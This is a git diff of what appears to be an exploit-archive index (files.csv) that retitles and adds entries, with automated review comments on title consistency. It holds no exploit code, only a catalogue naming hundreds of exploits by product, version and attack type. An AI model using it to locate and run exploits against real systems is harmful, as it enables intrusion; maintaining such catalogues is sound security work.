diff --git a/files.csv b/files.csv
index cb8ea457d..b49707ed4 100644
--- a/files.csv
+++ b/files.csv
@@ -676,7 +676,7 @@ id,file,description,date,author,platform,type,port
 4801,platforms/windows/dos/4801.html,"SkyFex Client 1.0 - ActiveX 'Start()' Method Remote Stack Overflow",2007-12-28,shinnai,windows,dos,0
 4829,platforms/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC)",2008-01-02,anonymous,windows,dos,0
 4856,platforms/multiple/dos/4856.php,"Half-Life CSTRIKE Server 1.6 - 'no-steam' Denial of Service",2008-01-06,"Eugene Minaev",multiple,dos,0
-4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0
+4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server 8.5.2 - Unauthenticated Remote Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0
 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash",2008-01-10,kingcope,solaris,dos,0
 4885,platforms/windows/dos/4885.txt,"QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow",2008-01-10,"Luigi Auriemma",windows,dos,0
 4893,platforms/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service",2008-01-11,"Clemens Kurtenbach",linux,dos,0
@@ -5519,7 +5519,7 @@ id,file,description,date,author,platform,type,port
 42052,platforms/multiple/dos/42052.txt,"Apple iOS/macOS - NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking in 'CAMediaTimingFunctionBuiltin'",2017-05-23,"Google Security Research",multiple,dos,0
 42054,platforms/multiple/dos/42054.c,"Apple iOS/macOS Kernel - Use-After-Free Due to Bad Locking in Unix Domain Socket File Descriptor Externalization",2017-05-23,"Google Security Research",multiple,dos,0
 42055,platforms/multiple/dos/42055.c,"Apple iOS/macOS Kernel - Memory Disclosure Due to Lack of Bounds Checking in netagent Socket Option Handling",2017-05-23,"Google Security Research",multiple,dos,0
-42056,platforms/macos/dos/42056.c,"Apple macOS - Local Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization",2017-05-23,"Google Security Research",macos,dos,0
+42056,platforms/macos/dos/42056.c,"Apple macOS - Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization",2017-05-23,"Google Security Research",macos,dos,0
 42063,platforms/multiple/dos/42063.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'WebCore::FrameView::scheduleRelayout' Use-After-Free",2017-05-25,"Google Security Research",multiple,dos,0
 42070,platforms/multiple/dos/42070.c,"Skia Graphics Library - Heap Overflow due to Rounding Error in SkEdge::setLine",2017-05-25,"Google Security Research",multiple,dos,0
 42071,platforms/multiple/dos/42071.html,"Mozilla Firefox < 53 - 'gfxTextRun' Out-of-Bounds Read",2017-05-25,"Google Security Research",multiple,dos,0
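Review bot: Dropping "Local" from the 42056 title removes the only attack-vector hint in that row, because its `type` column is `dos` and its path is under `platforms/macos/dos/`. The other "Local Privilege Escalation" trims in this commit (3897, 18733, 18914, 41959, 42542, 42735) are in rows typed `local`, where the word was redundant. Anyone triaging exposure by vector from the index will no longer see that this entry was described as local. Either keep `Local Privilege Escalation` in this one title, or confirm that the row is meant to stay typed `dos`.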
@@ -5678,6 +5678,8 @@ id,file,description,date,author,platform,type,port
 42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Read with Malformed _glyf_ Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0
 42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
+42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0
+42759,platforms/windows/dos/42759.html,"Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read",2017-09-19,"Google Security Research",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -6039,7 +6041,7 @@ id,file,description,date,author,platform,type,port
 2543,platforms/solaris/local/2543.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local,0
 2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0
 2569,platforms/solaris/local/2569.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)",2006-10-16,"Marco Ivaldi",solaris,local,0
-2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - (root file create) Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local,0
+2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - (Root File Create) Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local,0
 2581,platforms/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",linux,local,0
 2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - 'swpackage' Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0
 2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0
@@ -6048,7 +6050,7 @@ id,file,description,date,author,platform,type,port
 2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)",2006-10-24,"Marco Ivaldi",solaris,local,0
 2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Exploit",2006-10-29,Nanika,windows,local,0
 2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - Symlink Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0
-2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0
+2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (Unsafe System Call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0
 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0
 40380,platforms/win_x86-64/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",win_x86-64,local,0
 2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - (M3U Filename) Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local,0
@@ -6143,7 +6145,7 @@ id,file,description,date,author,platform,type,port
 3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution",2007-04-30,Marsu,windows,local,0
 3856,platforms/windows/local/3856.htm,"East Wind Software - 'advdaudio.ocx 1.5.1.1' Local Buffer Overflow",2007-05-05,shinnai,windows,local,0
 3888,platforms/win_x86/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",win_x86,local,0
-3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Escalation",2007-05-11,binagres,windows,local,0
+3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Privilege Escalation",2007-05-11,binagres,windows,local,0
 3912,platforms/win_x86/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,win_x86,local,0
 3975,platforms/windows/local/3975.c,"MagicISO 5.4 (build239) - '.cue' File Local Buffer Overflow",2007-05-23,vade79,windows,local,0
 3985,platforms/osx/local/3985.txt,"Apple Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0
@@ -7250,7 +7252,7 @@ id,file,description,date,author,platform,type,port
 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - (SEH + ASLR + DEP Bypass)",2012-04-03,b33f,windows,local,0
 18710,platforms/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,windows,local,0
 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0
-18733,platforms/linux/local/18733.py,"WICD 1.7.1 - Local Privilege Escalation",2012-04-12,anonymous,linux,local,0
+18733,platforms/linux/local/18733.py,"WICD 1.7.1 - Privilege Escalation",2012-04-12,anonymous,linux,local,0
 18749,platforms/osx/local/18749.py,"Microsoft Office 2008 SP0 (Mac) - RTF pFragments Exploit",2012-04-18,"Abhishek Lyall",osx,local,0
 18747,platforms/windows/local/18747.rb,"CyberLink Power2Go - name Attribute (p2g) Stack Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0
 18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0
@@ -7267,7 +7269,7 @@ id,file,description,date,author,platform,type,port
 18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0
 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0
 18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,windows,local,0
-18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Local Privilege Escalation",2012-05-22,sickness,windows,local,0
+18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0
 18917,platforms/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
 18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,windows,local,0
 18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0
@@ -8001,7 +8003,7 @@ id,file,description,date,author,platform,type,port
 22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0
 22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0
 22120,platforms/solaris/local/22120.c,"Sun Solaris 2.5.1/2.6/7.0/8/9 Wall - Spoofed Message Origin",2003-01-03,"Brant Roman",solaris,local,0
-22128,platforms/linux/local/22128.c,"H-Sphere Webshell 2.4 - Privilege Escalation",2003-01-06,"Carl Livitt",linux,local,0
+22128,platforms/linux/local/22128.c,"H-Sphere WebShell 2.4 - Privilege Escalation",2003-01-06,"Carl Livitt",linux,local,0
 22189,platforms/linux/local/22189.txt,"MTink 0.9.x - Printer Status Monitor Environment Variable Buffer Overflow",2003-01-21,"Karol Wiesek",linux,local,0
 22190,platforms/linux/local/22190.txt,"ESCPUtil 1.15.2 2 - Printer Name Local Buffer Overflow",2003-01-21,"Karol Wiesek",linux,local,0
 22193,platforms/windows/local/22193.txt,"WinRAR 2.90/3.0/3.10 - Archive File Extension Buffer Overrun",2003-01-22,nesumin,windows,local,0
@@ -8429,7 +8431,7 @@ id,file,description,date,author,platform,type,port
 29630,platforms/windows/local/29630.c,"Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local,0
 30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0
 29695,platforms/windows/local/29695.txt,"Comodo Firewall Pro 2.4.x - Local Protection Mechanism Bypass",2007-03-01,"Matousec Transparent security",windows,local,0
-29712,platforms/php/local/29712.txt,"Zend Platform 2.2.1 - PHP.INI File Modification",2007-03-03,"Stefan Esser",php,local,0
+29712,platforms/php/local/29712.txt,"Zend Platform 2.2.1 - 'PHP.INI' File Modification",2007-03-03,"Stefan Esser",php,local,0
 29714,platforms/linux/local/29714.txt,"Linux Kernel 2.6.17 - 'Sys_Tee' Privilege Escalation",2007-03-05,"Michael Kerrisk",linux,local,0
 29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0
 29746,platforms/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x - Cleanup Cron Script Arbitrary File Deletion",2007-03-15,anonymous,linux,local,0
@@ -8827,7 +8829,7 @@ id,file,description,date,author,platform,type,port
 38533,platforms/windows/local/38533.c,"Microsoft Windows 10 - pcap Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0
 38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0
 38559,platforms/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Privilege Escalation",2013-06-07,"Kees Cook",linux,local,0
-38576,platforms/aix/local/38576.sh,"AIX 7.1 - lquerylv Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0
+38576,platforms/aix/local/38576.sh,"AIX 7.1 - 'lquerylv' Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0
 38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - (Crawl website) Buffer Overflow",2015-11-02,MandawCoder,windows,local,0
 38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - (Scan Addresses) Buffer Overflow",2015-11-02,VIKRAMADITYA,windows,local,0
 38603,platforms/windows/local/38603.py,"TCPing 2.1.0 - Buffer Overflow",2015-11-02,hyp3rlinx,windows,local,0
@@ -9001,7 +9003,7 @@ id,file,description,date,author,platform,type,port
 40489,platforms/linux/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",linux,local,0
 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
 40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0
-40497,platforms/windows/local/40497.txt,"sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0
+40497,platforms/windows/local/40497.txt,"Sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0
 40564,platforms/win_x86/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",win_x86,local,0
 40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0
 40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
@@ -9169,7 +9171,7 @@ id,file,description,date,author,platform,type,port
 41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
 41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
 41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
-41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
+41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
 41971,platforms/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,windows,local,0
 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
@@ -9206,7 +9208,7 @@ id,file,description,date,author,platform,type,port
 42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
 42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
-42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Local Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0
+42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0
 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
@@ -9245,7 +9247,7 @@ id,file,description,date,author,platform,type,port
 42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
 42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation",2017-09-12,mr_me,windows,local,0
 42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0
-42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0
+42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -12923,7 +12925,7 @@ id,file,description,date,author,platform,type,port
 22106,platforms/linux/remote/22106.txt,"CUPS 1.1.x - Negative Length HTTP Header",2002-12-19,iDefense,linux,remote,0
 22112,platforms/windows/remote/22112.txt,"PlatinumFTPServer 1.0.6 - Information Disclosure",2002-12-30,"Dennis Rand",windows,remote,0
 22113,platforms/windows/remote/22113.txt,"PlatinumFTPServer 1.0.6 - Arbitrary File Deletion",2002-12-30,"Dennis Rand",windows,remote,0
-22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 - Remote Command Execution",2003-01-06,"Carl Livitt",linux,remote,0
+22129,platforms/linux/remote/22129.c,"H-Sphere WebShell 2.4 - Remote Command Execution",2003-01-06,"Carl Livitt",linux,remote,0
 22130,platforms/multiple/remote/22130.txt,"AN HTTPD 1.41 e - Cross-Site Scripting",2003-01-06,D4rkGr3y,multiple,remote,0
 22131,platforms/bsd/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",bsd,remote,0
 22135,platforms/linux/remote/22135.c,"TANne 0.6.17 - Session Manager SysLog Format String",2003-01-07,"dong-h0un yoU",linux,remote,0
@@ -13131,7 +13133,7 @@ id,file,description,date,author,platform,type,port
 22893,platforms/linux/remote/22893.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x - FTP Gateway Buffer Overflow",2003-07-11,V9,linux,remote,0
 22894,platforms/linux/remote/22894.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x - GSisText Buffer Overflow",2003-07-11,V9,linux,remote,0
 22898,platforms/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router - Information Disclosure",2003-07-14,cw,hardware,remote,0
-22903,platforms/windows/remote/22903.rb,"NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Remote Perl Code Execution (Metasploit)",2012-11-22,Metasploit,windows,remote,0
+22903,platforms/windows/remote/22903.rb,"NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Perl Remote Code Execution (Metasploit)",2012-11-22,Metasploit,windows,remote,0
 22905,platforms/windows/remote/22905.rb,"Apple QuickTime 7.7.2 - TeXML Style Element font-table Field Stack Buffer Overflow (Metasploit)",2012-11-24,Metasploit,windows,remote,0
 22908,platforms/linux/remote/22908.c,"Exceed 5.0/6.0/6.1/7.1/8.0 - Font Name Handler Buffer Overflow",2003-07-15,c0ntex,linux,remote,0
 22909,platforms/windows/remote/22909.txt,"NetSuite 1.0/1.2 - HTTP Server Directory Traversal",2003-07-15,dr_insane,windows,remote,0
@@ -13628,10 +13630,10 @@ id,file,description,date,author,platform,type,port
 24897,platforms/windows/remote/24897.rb,"KNet Web Server 1.04b - Buffer Overflow (SEH)",2013-03-29,"Myo Soe",windows,remote,0
 24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF 'Username' Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0
 24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor - Arbitrary Command Execution (Metasploit)",2013-04-12,Metasploit,linux,remote,5666
-24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell - Remote PHP Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0
+24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0
 24903,platforms/php/remote/24903.rb,"STUNSHELL Web Shell - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0
 24904,platforms/windows/remote/24904.rb,"Java CMM - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,windows,remote,0
-24905,platforms/multiple/remote/24905.rb,"v0pCr3w Web Shell - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,multiple,remote,0
+24905,platforms/multiple/remote/24905.rb,"v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,multiple,remote,0
 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0
 24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B - setup.cgi Remote Command Execution (Metasploit)",2013-04-08,Metasploit,hardware,remote,0
 24935,platforms/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0
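Review bot: The rename of 24905 to `v0pCr3w (Web Shell) - …` parenthesises the product class, while the two STUNSHELL rows in the same hunk keep the unparenthesised `STUNSHELL Web Shell - …`. The same kind of artefact is now spelled two ways within four rows, so a title search for `Web Shell -` no longer matches all of them in one form. Keeping `"v0pCr3w Web Shell - Remote Code Execution (Metasploit)"` would match its neighbours. If the parenthesised form is the intended convention, the STUNSHELL titles should change with it.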
@@ -13887,7 +13889,7 @@ id,file,description,date,author,platform,type,port
 26536,platforms/linux/remote/26536.txt,"Qualcomm WorldMail Server 3.0 - Directory Traversal",2005-11-17,FistFuXXer,linux,remote,0
 26540,platforms/linux/remote/26540.txt,"Inkscape 0.41/0.42 - '.SVG' Image Buffer Overflow",2005-11-21,"Joxean Koret",linux,remote,0
 26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote,0
-26622,platforms/php/remote/26622.rb,"InstantCMS 1.6 - Remote PHP Code Execution (Metasploit)",2013-07-05,Metasploit,php,remote,0
+26622,platforms/php/remote/26622.rb,"InstantCMS 1.6 - PHP Remote Code Execution (Metasploit)",2013-07-05,Metasploit,php,remote,0
 40386,platforms/hardware/remote/40386.py,"Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass",2016-09-16,"Sean Dillon",hardware,remote,161
 26737,platforms/lin_x86/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit",2013-07-11,kingcope,lin_x86,remote,0
 26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80
@@ -15583,7 +15585,7 @@ id,file,description,date,author,platform,type,port
 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote,0
 40846,platforms/android/remote/40846.html,"Google Android - 'BadKernel' Remote Code Execution",2016-11-28,"Guang Gong",android,remote,0
 40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0
-40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80
+40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80
 40136,platforms/linux/remote/40136.py,"OpenSSH 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22
 40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - 'WRQ' Buffer Overflow (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69
 40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0
@@ -15720,6 +15722,7 @@ id,file,description,date,author,platform,type,port
 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
 42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
+42756,platforms/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",java,remote,0
 42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251
 42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0
 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
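Review bot: The added 42756 title, `HPE < 7.2 - Java Deserialization`, appears to give a vendor and a version bound but no product name. The `< 7.2` bound therefore cannot be tied to any installed package, and a lookup by product will miss the row when someone checks whether a deployment is affected. The neighbouring rows follow a `Vendor Product version - Issue` shape; this one should too, e.g. `"HPE <PRODUCT NAME> < 7.2 - Java Deserialization"`, with the product taken from the exploit file itself.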
@@ -15838,6 +15841,7 @@ id,file,description,date,author,platform,type,port
 42724,platforms/windows/remote/42724.rb,"KingScada AlarmServer 3.1.2.13 - Stack Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,12401
